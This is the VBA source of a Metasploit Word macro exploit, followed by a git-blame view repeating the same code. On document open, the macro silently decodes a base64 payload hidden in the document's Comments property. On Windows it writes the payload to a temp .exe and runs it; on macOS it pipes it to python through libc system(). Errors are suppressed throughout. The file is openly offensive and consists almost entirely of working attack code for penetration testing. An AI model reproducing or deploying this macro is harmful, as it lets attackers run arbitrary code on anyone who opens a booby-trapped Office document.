metasploit-framework/external/source/exploits/office_word_macro/macro.vba

Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long

Sub AutoOpen()
    On Error Resume Next
    Dim found_value As String

    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            found_value = Mid(prop.Value, 56)
            orig_val = Base64Decode(found_value)
            #If Mac Then
                ExecuteForOSX (orig_val)
            #Else
                ExecuteForWindows (orig_val)
            #End If
            Exit For
        End If
    Next
End Sub

Sub ExecuteForWindows(code)
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    tmp_folder = fso.GetSpecialFolder(2)
    tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
    Set f = fso.createTextFile(tmp_name)
    f.Write (code)
    f.Close
    CreateObject("WScript.Shell").Run (tmp_name)
End Sub

Sub ExecuteForOSX(code)
    system ("echo """ & code & """ | python &")
End Sub


' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
  'rfc1521
  '1999 Antonin Foller, Motobit Software, http://Motobit.cz
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "Base64Decode", "Bad Base64 string."
    Exit Function
  End If

  
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3

      thisChar = Mid(base64String, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    
    nGroup = Hex(nGroup)
    
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  Base64Decode = sOut
End Function
Support OS X for Microsoft Office macro exploit 2017-02-16 18:28:11 +00:00			`Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long`

Add Microsoft Office Word Macro exploit 2017-02-02 23:44:55 +00:00			`Sub AutoOpen()`
			`On Error Resume Next`
			`Dim found_value As String`

			`For Each prop In ActiveDocument.BuiltInDocumentProperties`
			`If prop.Name = "Comments" Then`
			`found_value = Mid(prop.Value, 56)`
			`orig_val = Base64Decode(found_value)`
Support OS X for Microsoft Office macro exploit 2017-02-16 18:28:11 +00:00			`#If Mac Then`
			`ExecuteForOSX (orig_val)`
			`#Else`
			`ExecuteForWindows (orig_val)`
			`#End If`
			`Exit For`
Add Microsoft Office Word Macro exploit 2017-02-02 23:44:55 +00:00			`End If`
			`Next`
			`End Sub`

Support OS X for Microsoft Office macro exploit 2017-02-16 18:28:11 +00:00			`Sub ExecuteForWindows(code)`
			`On Error Resume Next`
			`Set fso = CreateObject("Scripting.FileSystemObject")`
			`tmp_folder = fso.GetSpecialFolder(2)`
			`tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"`
			`Set f = fso.createTextFile(tmp_name)`
			`f.Write (code)`
			`f.Close`
			`CreateObject("WScript.Shell").Run (tmp_name)`
			`End Sub`

			`Sub ExecuteForOSX(code)`
			`system ("echo """ & code & """ \| python &")`
			`End Sub`

Add Microsoft Office Word Macro exploit 2017-02-02 23:44:55 +00:00
			`' Decodes a base-64 encoded string (BSTR type).`
			`' 1999 - 2004 Antonin Foller, http://www.motobit.com`
			`' 1.01 - solves problem with Access And 'Compare Database' (InStr)`
			`Function Base64Decode(ByVal base64String)`
			`'rfc1521`
			`'1999 Antonin Foller, Motobit Software, http://Motobit.cz`
			`Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"`
			`Dim dataLength, sOut, groupBegin`

			`base64String = Replace(base64String, vbCrLf, "")`
			`base64String = Replace(base64String, vbTab, "")`
			`base64String = Replace(base64String, " ", "")`

			`dataLength = Len(base64String)`
			`If dataLength Mod 4 <> 0 Then`
			`Err.Raise 1, "Base64Decode", "Bad Base64 string."`
			`Exit Function`
			`End If`


			`For groupBegin = 1 To dataLength Step 4`
			`Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut`
			`numDataBytes = 3`
			`nGroup = 0`

			`For CharCounter = 0 To 3`

			`thisChar = Mid(base64String, groupBegin + CharCounter, 1)`

			`If thisChar = "=" Then`
			`numDataBytes = numDataBytes - 1`
			`thisData = 0`
			`Else`
			`thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1`
			`End If`
			`If thisData = -1 Then`
			`Err.Raise 2, "Base64Decode", "Bad character In Base64 string."`
			`Exit Function`
			`End If`

			`nGroup = 64 * nGroup + thisData`
			`Next`

			`nGroup = Hex(nGroup)`

			`nGroup = String(6 - Len(nGroup), "0") & nGroup`

			`pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _`
			`Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _`
			`Chr(CByte("&H" & Mid(nGroup, 5, 2)))`

			`sOut = sOut & Left(pOut, numDataBytes)`
			`Next`

			`Base64Decode = sOut`
			`End Function`